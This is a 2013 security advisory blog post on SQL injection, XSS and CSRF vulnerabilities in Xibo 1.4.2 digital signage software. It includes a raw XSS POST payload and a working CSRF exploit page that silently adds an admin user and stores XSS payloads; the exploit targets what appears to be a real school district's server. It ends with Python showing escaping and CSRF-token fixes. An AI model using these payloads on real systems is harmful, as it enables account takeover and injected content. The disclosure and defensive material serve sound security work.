Wednesday, August 21, 2013

[Exploit] Xibo - Digital Signage SQL Injection, XSS, CSRF

# Title: Xibo - Digital Signage SQL Injection, XSS, CSRF
# Discovered and Reported: July 2013
# Discovered/Exploited By: Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
# Exploit/Advisory: http://infosec42.blogspot.com/
# Software: Xibo 1.4.2 - http://xibo.org.uk/get-xibo/
# Version Tested: Xibo 1.4.2 (Other versions were not tested and may be vulnerable.)
# CVE: SQL Injection - CVE-2013-4887, XSS - CVE-2013-4888, CSRF - CVE-2013-4889



SQL Injection Vulnerability - CVE-2013-4887

Figure 1 - JSON Error

Figure 2 - Xibo application log containing a SQL error that corresponds to the JSON error

Figure 3 - JSON data containing the result of a successful SQL query

Figure 4 - Client-side HTML code was modified to reflect the query demonstrated in Figure 3


Cross-Site Scripting (XSS) Vulnerability - CVE-2013-4888

POST:  /index.php?p=layout&q=add&ajax=true
Data: layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E&description=%3Ciframe+src%3D'http%3A%2F%2Fsecurityevaluators.com'+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0

Figure 5 - JSON data indicating a successful request

Figure 6 - Rendered page containing injected HTML iframe and img tags


Cross-Site Request Forgery (CSRF) Vulnerability - CVE-2013-4889

The following JavaScript PoC will create an Xibo administrative user and also set the XSS payloads discussed above.

<html>
<head>
<title> Xibo - Digital Signage 1.4.2 CSRF Exploit.</title>
<!--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# CVE: CSRF - CVE-2013-4889, XSS - CVE-2013-4888
# http://infosec42.blogspot.com
# http://securityevaluators.com
-->
</head>
<body>
<h1>Please wait... </h1>
<script type="text/javascript">
//Add super user
function RF1(){
    document.write('<form name="addAdmin" target ="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=user&q=AddUser&ajax=true" method="post">'+
    '<input type="hidden" name="userid" value="0">'+
    '<input type="hidden" name="username" value="Gimppy">'+
    '<input type="hidden" name="password" value="ISE">'+
    '<input type="hidden" name="email" value="Gimppy@infosec42.com">'+
    '<input type="hidden" name="usertypeid" value="1">'+
    '<input type="hidden" name="groupid" value="1">'+
    '</form>');
}

//Set XSS Payloads
function RF2(){
    document.write('<form name="addXSS" target="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=layout&q=add&ajax=true" method="post">'+
    '<input type="hidden" name="layoutid" value="0">'+
    '<input type="hidden" name="layout" value="Gimppy<img src=42 onerror=\'alert(42)\'>">'+
    '<input type="hidden" name="description" value="<iframe src=\'http://securityevaluators.com\' width=100 height=1000</iframe>">'+
    '<input type="hidden" name="tags" value="">'+
    '<input type="hidden" name="templateid" value="0">'+
    '</form>');
}

function createPage(){
    RF1();
    RF2();
}

function _addAdmin(){
    document.addAdmin.submit();
}

function _addXSS(){
    document.addXSS.submit();
}

//Called Functions
createPage();

for (var i = 0; i < 2; i++){
    if(i == 0){
        // 500 ms delay (the legacy octal literal 0500 would have been 320 ms)
        window.setTimeout(_addAdmin, 500);
    }
    else if(i == 1){
        window.setTimeout(_addXSS, 1000);
    }
    else{
        continue;
    }
}
</script>
</body>
</html>
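The XSS request above stores raw HTML in the layout name and description, and the CSRF PoC works because the AddUser and layout-add endpoints accept any POST carrying the admin's session cookie. The following is an added example, not Xibo's own code, of the two server-side checks that close both issues: HTML-escaping the free-text layout fields before storage, and requiring a per-session synchronizer token plus a same-origin Origin header on state-changing requests. The request body is copied from the XSS request above; the session dict and expected origin are assumptions.

```python
import hmac
import html
import secrets
from urllib.parse import parse_qs

# Constructed: the form body from the XSS request shown above.
XSS_BODY = (
    "layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E"
    "&description=%3Ciframe+src%3D'http%3A%2F%2Fsecurityevaluators.com'"
    "+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0"
)


def sanitize_layout_fields(body):
    """Decode the form body and HTML-escape the free-text fields.

    After escaping, '<img ...>' and '<iframe ...>' are stored as literal
    text, so the layout page renders them instead of executing them.
    """
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {k: html.escape(fields.get(k, ""), quote=True)
            for k in ("layout", "description", "tags")}


def issue_csrf_token(session):
    """Mint a random token and bind it to the server-side session (assumed dict)."""
    session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def csrf_request_allowed(session, form_token, origin, expected_origin):
    """Accept a state-changing POST only if it carries the session's token
    and was sent from the application's own origin.

    A cross-site auto-submitted form, like the PoC above, cannot read the
    token out of the victim's session and arrives with the attacker's
    Origin header, so it fails both checks.
    """
    token = session.get("csrf")
    if not token or not form_token:
        return False
    if not hmac.compare_digest(token, form_token):  # constant-time compare
        return False
    return origin == expected_origin
```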
